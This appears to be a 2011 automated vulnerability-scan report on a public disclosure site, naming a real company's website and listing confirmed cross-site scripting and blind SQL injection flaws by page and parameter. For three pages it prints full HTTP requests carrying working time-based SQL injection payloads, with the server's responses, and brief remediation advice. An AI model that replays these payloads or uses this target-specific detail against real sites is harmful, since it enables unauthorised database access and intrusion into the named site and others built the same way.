XSS, Cross Site Scripting in ww.strategicvision.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.strategicvision.com/clients.php
SCAN DATE
7/27/2011 8:49:20 PM
REPORT DATE
7/28/2011 9:38:54 AM
SCAN DURATION
01:08:04

Total Requests

20777

Average Speed

5.09 req/sec.
50
identified
45
confirmed
6
critical
6
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
12 %
IMPORTANT
68 %
LOW
8 %
INFORMATION
12 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/blog.php Redirect Response BODY Is Too Large Yes
/client_dao_authenticate.php userID POST Cross-site Scripting Yes
userID POST Cross-site Scripting Yes
/client_dao_login.php Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
/clients.php Cookie Not Marked As HttpOnly Yes
PHP Version Disclosure No
E-mail Address Disclosure No
/consumers.php numCars POST Cross-site Scripting Yes
yr2 POST Cross-site Scripting Yes
mk2 POST Cross-site Scripting Yes
mo2 POST Cross-site Scripting Yes
yr4 POST Cross-site Scripting Yes
numCars POST Cross-site Scripting Yes
yr2 POST Cross-site Scripting Yes
mk2 POST Cross-site Scripting Yes
mo2 POST Cross-site Scripting Yes
yr4 POST Cross-site Scripting Yes
mk4 POST Cross-site Scripting Yes
numCars POST Cross-site Scripting Yes
yr2 POST Cross-site Scripting Yes
mk2 POST Cross-site Scripting Yes
mo2 POST Cross-site Scripting Yes
/images/ Forbidden Resource Yes
/press_release.php pr GET Blind SQL Injection Yes
pr GET Boolean Based SQL Injection Yes
/ratings.php Make POST Blind SQL Injection Yes
Make POST Boolean Based SQL Injection Yes
numCars POST Cross-site Scripting Yes
yr2 POST Cross-site Scripting Yes
mk2 POST Cross-site Scripting Yes
mo2 POST Cross-site Scripting Yes
yr4 POST Cross-site Scripting Yes
numCars POST Cross-site Scripting Yes
yr2 POST Cross-site Scripting Yes
mk2 POST Cross-site Scripting Yes
mo2 POST Cross-site Scripting Yes
yr4 POST Cross-site Scripting Yes
mk4 POST Cross-site Scripting Yes
numCars POST Cross-site Scripting Yes
yr2 POST Cross-site Scripting Yes
mk2 POST Cross-site Scripting Yes
mo2 POST Cross-site Scripting Yes
/sitemap.xml Apache Version Disclosure No
Sitemap Identified No
Apache Version Is Out Of Date No
/team.php person GET Blind SQL Injection Yes
person GET Boolean Based SQL Injection Yes
MySQL Database Identified Yes
/view_ratings.php referrer POST Cross-site Scripting Yes
Blind SQL Injection

Blind SQL Injection

3 TOTAL
CRITICAL
CONFIRMED
3
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /team.php

/team.php CONFIRMED

http://www.strategicvision.com/team.php?person=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+

Parameters

Parameter Type Value
person GET -111 OR SLEEP(25)=0 LIMIT 1--

Request

GET /team.php?person=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: http://www.strategicvision.com/clients.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:50:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Darrel Edwards, Ph.D.</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">COMPANY</div><div class="sidemenu_item"><a href="company.php">Overview</a></div><div class="sidemenu_item"> <a href="team.php">Team</a></div><div class="sidemenu_item"><a href="clients.php">Clients</a></div><div class="sidemenu_item"><a href="charity.php">Charity</a></div><div class="sidemenu_item"><a href="press_contacts.php">Press Contacts</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> <!-- Start the content --> <a name="top"></a> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Darrel Edwards, Ph.D.</div> <div class="pagetext"> <p>
Dr. Darrel Edwards is the founding partner of Strategic Vision, Inc., a consulting and research firm based in San Diego, California.
</p>
<p>
Dr. Edwards developed his ValueCentered methodology earlier in his career
and established research organizations in this approach worldwide beginning
in 1973. The basic premise of the method is that the individual's personal
values are at the core of their personal decisions. The ValueCentered approach
is the cornerstone of Strategic Vision today.
</p>
<p>
He is an expert in motivation and decision making, research and communications;in
customer satisfaction, retention, loyalty, commitment and decision making;
and research design, data structrue, analysis and inference. He has applied
the ValueCentered procedures in many fields: accounting, airlines, the automotive
industry, banking, education, entertainment, food and beverages, health and
beauty, law, leadership, medicine, politics, restaurants, recreation, and
telecommunications.
</p>
<p>
His analyses lead to the development of innovative concepts as (1) thoughtful engineering/design, and (2) total quality in the automotive industry.
</p>
<p>
He has made professional presentations to the widest variety of audiences from world leaders, corporate CEO's, advertising creative pros, and corporate and academic researchers and managers.
</p>
<p>
His work and academic background:
</p>

<ul>
<li>B.A. in Psychology and Philosophy, Brigham Young University, 1965</li>
<li>M.A. Psychology and Philosophy, BYU, 1967</li>
<li>Ph.D. Clinical Psychology and Philosophy, BYU, 1968</li>
<li>Diplomate Clinical Psychology, American Board of Professional Psychology, 1978</li>

<li>Who's Who...
<ul>
<li>In the World</li>
<li>In the USA</li>
<li>In the West</li>
<li>In Science and Engineering</li>
<li>In Medicine and Healthcare</li>
<li>of Emerging Leaders in America</li>
</ul>
</li>
</ul>

1973 to date
<ul>
<li>Fellow of the National Aeronautic and Space Administration - Decision Making and problem solving strategies, 1965-1968</li>
<li>Post-Doctoral Research Fellow in verbal learning and behavior, psycholinguistics, The Pennsylvania State University, 1968-69</li>
<li>Post-Doctoral Clinical Fellow in clinical psychology USNH, Bethesda, MD, 1969-70, USN</li>
<li>Head of Clinical Decision Branch and Assistant Director of Health Decision, Naval Medical Research Center, 1970-78</li>
<li>Established ValueCentered research organizations worldwide, including Australia,
Canada, China, Colombia, Costa Rica, England, France, Germany, Italy, Japan,
Kenya, Mexico, Russia, 1973 to date. </li>
<li>"2000 Outstanding Scientists of the 20th Century" awarded by the International Biographical Centre, Cambridge, England.</li>
</ul> </div> <p><a href="#top">^ back to top</a></p> <!-- End the page --> </td> <td width="150" valign="top"> </td> </tr></table> <hr noshade size="1" color="#DDDDDD" width="760" align="center" /><table id="footertable" align="center"> <tr> <td align="left" valign="top" width="50%"> <a href="sitemap.php" class="footer">SITE MAP</a> &nbsp; | &nbsp; <!--<a href="privacy.php" class="footer">PRIVACY POLICY</a> &nbsp; | &nbsp; --> <a href="press_contacts.php" class="footer">CONTACT US</a> &nbsp; | &nbsp;<a href="admin.php" class="footer">ADMIN</a> &nbsp; | &nbsp; <a href="privacy.php" class="footer">PRIVACY</a> </td> <td align="right" valign="top" width="50%"> &copy; 2004-2011 Strategic Vision, Inc.<br /> Site by <!--<a href="http://www.nickbarrett.org" title="Nick Barrett" target="_blank" class="footer">Nick Barrett</a> &amp;--><a href="mailto:pgossling@gmail.com" class="footer">Philip Gossling</a> </td> </tr></table> </div> </td> <td width="5" bgcolor="#CCCCCC" background="images/content_rightshadow.gif">&nbsp;</td> </tr></table> </center> </body></html>
- /press_release.php

/press_release.php CONFIRMED

http://www.strategicvision.com/press_release.php?pr=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+

Parameters

Parameter Type Value
pr GET -111 OR SLEEP(25)=0 LIMIT 1--

Request

GET /press_release.php?pr=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: http://www.strategicvision.com/auto_research.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 01:51:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Press Releases - The 2004 Total Quality Awards�</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">PRESS</div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"> <a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="press_contacts.php">Press Contacts</a></div><div class="sidemenu_item"><a href="press_rss.php">RSS Feeds</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Press Release</div> <br /> <div class="pagetext"> <div class="pagetitle_small">The 2004 Total Quality Awards�</div> <div class="boldtext" style="font-size: 14px; color:#777777;"><i>GM, Hyundai Score Big Says Strategic Vision</i></div> <p class="pagesubtitle">For immediate release - Monday, May 24, 2004</p> <p><a href="pdf/2011-06-29_V6.php" target="_blank">[Adobe PDF version available]</a></p> <p>San Diego -- General Motors is starting to deliver on its promise of better products, according to the people who buy them. The auto giant led in 11 of 19 segments (five ties) on Strategic Vision's 2004 Total Quality Index� (TQI), the San Diego-based research firm announced today.<br />
<br />
Among GM brands, Chevrolet led with four wins (1 a tie), followed by Cadillac (3 wins; 1 a tie), Saturn (tied in 2 segments) and Buick (tied in 1 segment). "GM has been saying for some time that's it's improving its products," says Strategic Vision vice president Daniel Gorrell, "so they should be proud that many of their buyers agree. The challenge will be to continue this momentum and regain the trust, and then the hearts and minds of the U.S. car and truck buyer."<br />
<br />
TQI, the premier measure of new vehicle owner satisfaction, assesses new buyers' responses to the complete ownership experience, including buying, owning and driving their new vehicles. The calculations also include the emotional response to that experience.<br />
<br />
In addition to the Santa Fe's repeat win in the small SUV segment, Hyundai's Elantra and Sonata were co-leaders in their segments. Nissan Motor also had three wins (2 were ties), two for Infiniti and one for Nissan. The other domestic manufacturers each had two wins, as did Honda (with one for each a tie). The Lexus 430 was Toyota's only top scorer.<br />
<br />
Infiniti and Mercedes Benz were the highest scoring brands, while Cadillac continued in second place, tying with Jaguar and Lexus. Mitsubishi and Dodge were the most improved brands. "The real challenge for GM and other brands who are turning their products around," says Gorrell, "is to convince potential buyers, particularly entrenched Toyota and Honda owners, to take a look."<br />
<br />
Buyers rated the following vehicles tops in their segments: (closely ranked scores, if the differences are not statistically significant, are considered ties)<br />
<br />
<hr noshade="noshade" size="1"><br />
<p><table border="0" cellpadding="5" cellspacing="0" width="100%" class="text"> <tr class="boldtext" bgcolor="#EEEEEE"><td>Segment</td><td>Winner(s)</td><td align="center">TQI Score</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=1">Small Car</a></td> <td valign="top">Hyundai Elantra<br />Saturn Ion</td> <td valign="top" align="center">867</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=2">Compact Car</a></td> <td valign="top">Chevrolet Malibu</td> <td valign="top" align="center">883</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=3">Compact Wagons</a></td> <td valign="top">Volkswagen Jetta Wagon</td> <td valign="top" align="center">840</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=4">Mid-Size Car</a></td> <td valign="top">Acura TSX</td> <td valign="top" align="center">888</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=5">Mid-Size Wagon</a></td> <td valign="top">Volkswagen Passat Wagon</td> <td valign="top" align="center">856</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=6">Larger Car</a></td> <td valign="top">Chrysler Concorde<br />Buick LeSabre</td> <td valign="top" align="center">851</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=7">Sporty Coupes Under $25,000</a></td> <td valign="top">Mini Cooper</td> <td valign="top" align="center">903</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=8">Sporty Coupes Over $25,000</a></td> <td valign="top">Chevrolet Corvette</td> <td valign="top" align="center">905</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=9">Mid-Specialty Car</a></td> <td valign="top">Chevrolet Monte Carlo</td> <td valign="top" align="center">885</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=10">Near Luxury Car</a></td> <td valign="top">Infiniti G35 Sedan</td> <td valign="top" align="center">900</td></tr><tr> <td valign="top"><a href="auto_segmentwinners.php?year=2004&award=TQA&seg=11">Luxury/Sport Wagons</a></td> <td valign="top">Audi Allroad Quattro</td> <td valign="top" align="center">890</td></tr><tr bgcolor="#EEEEEE"> <td valign="top"&..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST -111' OR SLEEP(25)=0 LIMIT 1--
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=098bd1vhc6te46dd5rso7uj730
Content-Length: 156
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:51:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
